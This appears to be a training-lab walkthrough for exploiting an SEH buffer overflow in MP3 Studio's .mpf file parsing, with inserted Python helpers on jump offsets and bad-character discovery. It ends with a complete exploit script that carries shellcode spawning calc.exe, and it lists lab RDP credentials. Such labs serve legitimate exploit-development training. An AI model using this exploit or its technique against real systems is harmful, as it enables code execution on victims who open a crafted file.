Lab4 Windows SEH Overflow MP3

The document describes exploiting a SEH overflow vulnerability in MP3 Studio on Windows. It provides steps to identify the vulnerable software, attach a debugger, determine offsets, craft an exploit, and spawn calc.exe as proof of successful exploitation.

Uploaded by Saw Gyi

© 2019 Caendra Inc. | Hera for XDS | Windows SEH Overflow (MP3 Studio)


You have been tasked by your red team manager to refresh your Windows exploit
development skills. Specifically, he provided you with a machine (172.16.172.37) that
features a version of MP3 Studio vulnerable to an SEH overflow. An exploit skeleton* is also
provided to you. Your task is to fully exploit the SEH-based overflow vulnerability of MP3
Studio.

*MP3 Studio is vulnerable to an SEH-based buffer overflow when parsing .mpf files. Find below
the exploit skeleton that causes the software to crash.

• Fully exploit the vulnerable MP3 Studio software
• Spawn calc.exe as a proof of concept

• Attacking file parsing mechanisms
• Exploiting SEH-based stack overflows

• ImmunityDbg
• Mona.py
• Python
• Notepad++

• Penetration tester’s Subnet: 172.16.172.0/24

• Vulnerable machine: 172.16.172.37

• Connection Type: RDP

Username: elsadmin
Password: elsadmin1

If you are on Windows, use the mstsc command or the Remote Desktop Connection
application, and then type the IP address.

If you are on Linux, you can use a tool like rdesktop.

Note: In case of choppy RDP performance, disconnect from the VPN, edit the latest .ovpn file
and switch the protocol from udp to tcp. Then, re-connect to the lab VPN using the edited
.ovpn file.

Confirm the vulnerability by attaching Immunity to MP3 Studio and crashing the
application, utilizing the exploit skeleton.

Hint: Leverage Immunity’s “View -> SEH chain” functionality to see exactly how the SEH
structure is overwritten.

Utilize Mona’s pattern_create and pattern_offset commands to identify the offsets to
SEH and EIP.

As discussed in the course, during SEH-based overflows we have to redirect execution
past the SEH entry.

Hint: Mona can provide us with the gadgets and the proper jumps to achieve that.

During the course we have already discussed how a single bad character can corrupt a
whole exploit. Utilize the usual ASCII table within your payload and look into the
debugger for any bad characters.

Fully exploit MP3 Studio so that a calc.exe is launched.

Below, you can find solutions for each task. Remember though that you can follow your
own strategy (which may be different from the one explained in the following lab).

Let’s start MP3 Studio and attach Immunity to it. Let’s then run the exploit and drag-drop the
generated .mpf file onto the player. We are greeted by an access violation message.

Once we pass the exception to the program, we receive the following.

It seems that we can control the EIP via an exception handler overwrite. Let’s restart the
application and attach the debugger to it. Then, let’s run the exploit once again. Now, before
passing the exception, let’s take a look at View -> SEH chain.

It’s confirmed that we can overwrite the SEH structure with “A”s. Let’s now determine the
proper offset to it.

Without closing the debugger window, let’s use Mona to create a pattern of proper length, as
follows.

Since the pattern is too long to be displayed in the console, it can be found inside the
Immunity Debugger folder as pattern.txt. By default, Immunity’s directory is:

C:\Program Files\Immunity Inc\Immunity Debugger

Let’s paste the pattern into the exploit and then provide the application with the latest .mpf
file that was generated.

After passing the exception to the program we use the displayed EIP value to calculate the
offset using mona, as follows.

So, the SEH handler pointer is being overwritten at offset 4116. But we should also consider
that in the SEH structure there is an nSEH pointer before it, and it is 4 bytes wide. We should
thus subtract 4 from the displayed value. With that said, the SEH structure starts being
overwritten at byte 4112. Let’s modify our exploit and confirm that calculation.

Before passing the exception into the program, let’s view the SEH chain.

It seems that we found the proper offsets. Let’s pass the exception to confirm we successfully
altered the EIP to our controlled value.

Indeed, that is the case!

Now, let’s examine the stack near the exception handler. Is there enough place for shellcode?

There’s an obstacle – the software, for some reason, splits the payload into pieces. We will
get back to this in a while; for now, let’s find a proper SEH gadget in order to redirect
execution flow to our buffer. This can be done with Mona, as follows.

The produced gadgets can be found inside the Immunity Debugger folder in file seh.txt.

Let’s choose any of them, remembering that it should originate from a module that has all
exploit protections set to false.

0x77ec9cac : pop edx # pop eax # ret

Let’s add the above gadget into our exploit in place of the current SEH pointer. Also, let’s
change the nSEH pointer (currently B’s) to breakpoints. This way, once we start executing it,
the debugger will pause, letting us know whether we are heading in the right direction.

After re-generating the .mpf file and providing it to the restarted application, let’s observe
the crash. Let’s also pass the exception to the program.

Great, we have reliable code execution now. However, if we scroll down the stack to the
exception handler structure, we will find the place that we are currently executing code from.
The payload was again corrupted by some 0’s being added there.

What can we do about this?

In the classical way of SEH exploitation, the nSEH pointer is replaced with a short jump
forward in order to skip the SEH record (which was overwritten with the gadget address and
cannot be treated as a valid instruction). Usually, 6 bytes are enough. In this case, the hole in
the payload is close enough to still be in the range of a short jump; if we use a longer jump,
e.g. 32 bytes, we can still use this technique. Let’s try the following approach:

• Jump ~30 bytes forward with EB 22 (instead of the classical EB 06 instruction).
• Replace some initial D’s with NOPs, so that we don’t need to be perfectly precise
with the jump (if we land in a NOP slide, we will reach the code that resides past it).
After experimenting for a while with the payload truncation, it seems that 50 NOPs
is a reasonable value.
• Add a shellcode placeholder including a breakpoint at the end of the NOP slide, so
the debugger pauses if we are able to reach it.
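Where exactly EB 22 lands, and why a 50-byte NOP slide absorbs the parser's insertions, follows from the encoding of `jmp short`: the rel8 byte is a signed displacement from the end of the 2-byte instruction. The Python 3 code below is an added illustration (not the lab's exploit) that computes the landing point from the lab's own offsets (4112/4116), the 50 NOPs and the EB 22 / EB 06 encodings; the region names and the 200-byte shellcode placeholder length are assumptions of the example.

```python
NSEH_OFFSET = 4112            # start of the overwritten SEH record (next-record field)
SEH_OFFSET = NSEH_OFFSET + 4  # handler field, overwritten with the gadget address


def short_jmp_target(instr_offset, opcode):
    """Offset the CPU continues at after a 2-byte 'jmp short rel8' (EB xx) at instr_offset.

    rel8 is signed and relative to the end of the instruction, so EB 22 placed in
    nSEH continues 2 + 0x22 = 36 bytes past the start of nSEH (not 0x22 bytes).
    """
    if len(opcode) != 2 or opcode[0] != 0xEB:
        raise ValueError("expected a 2-byte short jump (EB rel8)")
    rel8 = opcode[1] - 0x100 if opcode[1] >= 0x80 else opcode[1]  # sign-extend
    return instr_offset + 2 + rel8


def build_layout(nop_count=50, shellcode_len=200):
    """[start, end) offsets of each region: A*4112 | nSEH | SEH | NOPs | shellcode."""
    nops_start = SEH_OFFSET + 4
    sc_start = nops_start + nop_count
    return {
        "nseh": (NSEH_OFFSET, NSEH_OFFSET + 4),
        "seh": (SEH_OFFSET, SEH_OFFSET + 4),
        "nops": (nops_start, sc_start),
        "shellcode": (sc_start, sc_start + shellcode_len),  # assumed placeholder size
    }


def landing_region(layout, nseh_bytes):
    """Name of the region the jump in nSEH lands in, and how many bytes into it."""
    target = short_jmp_target(layout["nseh"][0], nseh_bytes[:2])
    for name, (lo, hi) in layout.items():
        if lo <= target < hi:
            return name, target - lo
    return "beyond_buffer", target - layout["shellcode"][1]


def insertion_tolerance(layout, nseh_bytes):
    """How many bytes the parser may insert right after the SEH record (pushing the
    slide forward) before the jump no longer lands inside the NOPs."""
    region, into = landing_region(layout, nseh_bytes)
    return into if region == "nops" else 0


if __name__ == "__main__":
    lay = build_layout()
    print(landing_region(lay, b"\xeb\x22\x90\x90"))   # ('nops', 28)
    print(landing_region(lay, b"\xeb\x06\x90\x90"))   # ('nops', 0)
    print(insertion_tolerance(lay, b"\xeb\x22\x90\x90"))  # 28
```

The classical EB 06 lands on the very first NOP, so any byte the parser inserts after the record would push the slide out from under the jump; EB 22 lands 28 bytes into the slide, which is the slack that lets the exploit tolerate the zeros the lab observes near the record.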

After launching the latest exploit and passing the exception to the program, we can see
that we are executing code from our D-buffer.

Now, before we implement the actual shellcode, let’s check for bad characters. We will use
the standard ASCII table, as follows.

badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

After re-loading the application, using the latest exploit file, and passing the exception to the
program, the bad char buffer should be clearly visible down the stack, right after the NOPs
and the breakpoint.

But, it’s quickly truncated after the a0 character. Let’s remove it from the bad char buffer and
try again.

This time it is truncated after \x37. Let’s continue to investigate until we are able to see full
buffer on the stack.

Finally, the bad characters were:

\x0a\x00\x0d\x37\x1a

After removing the above-mentioned bad chars, we will be able to see the whole buffer.
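The remove-and-retry loop the lab runs by hand (send the table, see where the copy on the stack stops matching, drop that byte, repeat) is a small algorithm, and writing it down makes clear why each round can only reveal one byte: everything after the first bad byte is gone or shifted. The Python 3 code below is an added illustration, not the lab's code or mona's (mona's `!mona compare` automates the same comparison against a dump). The parser stand-in `constructed_parser` is constructed for the example and simply truncates at the first byte from a given set; the real parser's behaviour is known only from the debugger. With the set of terminators chosen here the loop converges on the lab's final list (\x0a\x00\x0d\x37\x1a), though the order of discovery depends on the parser and differs from the order in the text.

```python
def ascii_table(excluded):
    """The 'usual ASCII table' test buffer: every byte 0x01..0xff not yet excluded.
    0x00 is never sent, exactly as in the lab's badchars string, which starts at 0x01."""
    return bytes(b for b in range(1, 256) if b not in excluded)


def first_divergence(sent, observed):
    """Index at which the observed copy stops matching what was sent (truncation or
    a mangled byte), or None when the whole buffer arrived intact."""
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return i
    return None


def constructed_parser(data, terminators):
    """Constructed stand-in for the vulnerable .mpf parser: it drops everything from
    the first terminator byte onwards. Only used to drive the example offline."""
    for i, b in enumerate(data):
        if b in terminators:
            return data[:i]
    return data


def find_bad_chars(deliver, excluded=frozenset({0x00}), max_rounds=256):
    """Repeat send/compare until the buffer survives unchanged.

    `deliver(buf)` returns the bytes observed on the stack after the crash. Each
    round adds the byte at the first divergence, i.e. the one just past the last
    visible byte, to the exclusion set. Returns (bad_bytes, discovery_order).
    """
    bad = set(excluded)
    order = []
    for _ in range(max_rounds):
        sent = ascii_table(bad)
        observed = deliver(sent)
        idx = first_divergence(sent, observed)
        if idx is None:
            return frozenset(bad), order
        bad.add(sent[idx])
        order.append(sent[idx])
    raise RuntimeError("did not converge; the parser is mangling more than one byte per round")


def fmt(byte_set):
    """Render a byte set the way the lab lists it, e.g. \\x00\\x0a\\x0d."""
    return "".join("\\x%02x" % b for b in sorted(byte_set))


if __name__ == "__main__":
    TERMINATORS = {0x0a, 0x0d, 0x1a, 0x37}          # constructed, chosen to match the lab's result
    bad, order = find_bad_chars(lambda buf: constructed_parser(buf, TERMINATORS))
    print(fmt(bad), "found in order", fmt(order))
```

In the real session `deliver` is the human step (regenerate the file, crash the player, read the stack), but the comparison logic is the same; `first_divergence` also catches the case where a byte is substituted rather than dropped, which a visual scan of the dump can miss.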

Let’s generate a calc-spawning shellcode using msfvenom and incorporate it into the exploit, as
follows.

Let’s now generate the exploit file, and launch MP3 player without a debugger attached.

Then, let’s drag-drop the exploit file onto the player. Calc should pop up if everything went
as expected.

Here’s the full exploit code (Python 2).

file = "exploit.mpf"

# Shellcode generated with:
#   msfvenom -p windows/exec cmd=calc.exe -b "\x0a\x00\x0d\x37\x1a" -f c
sc = ("\xb8\xb2\x9e\x3c\x9c\xda\xd3\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
"\x31\x83\xeb\xfc\x31\x43\x0f\x03\x43\xbd\x7c\xc9\x60\x29\x02"
"\x32\x99\xa9\x63\xba\x7c\x98\xa3\xd8\xf5\x8a\x13\xaa\x58\x26"
"\xdf\xfe\x48\xbd\xad\xd6\x7f\x76\x1b\x01\xb1\x87\x30\x71\xd0"
"\x0b\x4b\xa6\x32\x32\x84\xbb\x33\x73\xf9\x36\x61\x2c\x75\xe4"
"\x96\x59\xc3\x35\x1c\x11\xc5\x3d\xc1\xe1\xe4\x6c\x54\x7a\xbf"
"\xae\x56\xaf\xcb\xe6\x40\xac\xf6\xb1\xfb\x06\x8c\x43\x2a\x57"
"\x6d\xef\x13\x58\x9c\xf1\x54\x5e\x7f\x84\xac\x9d\x02\x9f\x6a"
"\xdc\xd8\x2a\x69\x46\xaa\x8d\x55\x77\x7f\x4b\x1d\x7b\x34\x1f"
"\x79\x9f\xcb\xcc\xf1\x9b\x40\xf3\xd5\x2a\x12\xd0\xf1\x77\xc0"
"\x79\xa3\xdd\xa7\x86\xb3\xbe\x18\x23\xbf\x52\x4c\x5e\xe2\x38"
"\x93\xec\x98\x0e\x93\xee\xa2\x3e\xfc\xdf\x29\xd1\x7b\xe0\xfb"
"\x96\x74\xaa\xa6\xbe\x1c\x73\x33\x83\x40\x84\xe9\xc7\x7c\x07"
"\x18\xb7\x7a\x17\x69\xb2\xc7\x9f\x81\xce\x58\x4a\xa6\x7d\x58"
"\x5f\xc5\xe0\xca\x03\x24\x87\x6a\xa1\x38")

buffer = "A"*4112                 # padding up to the start of the SEH record (offset 4112)
buffer += "\xeb\x22\x90\x90"      # nSEH: jmp short +0x22 (more than 30 bytes forward) + 2 NOPs
buffer += "\xac\x9c\xec\x77"      # SEH: 0x77ec9cac : pop edx # pop eax # ret
buffer += "\x90"*50               # NOP slide the jump lands in
buffer += sc                      # calc.exe shellcode

# Binary mode: in text mode on Windows any 0x0a byte would be written as 0x0d 0x0a
f = open(file, "wb")
f.write(buffer)
f.close()

print "[+] File saved as " + file
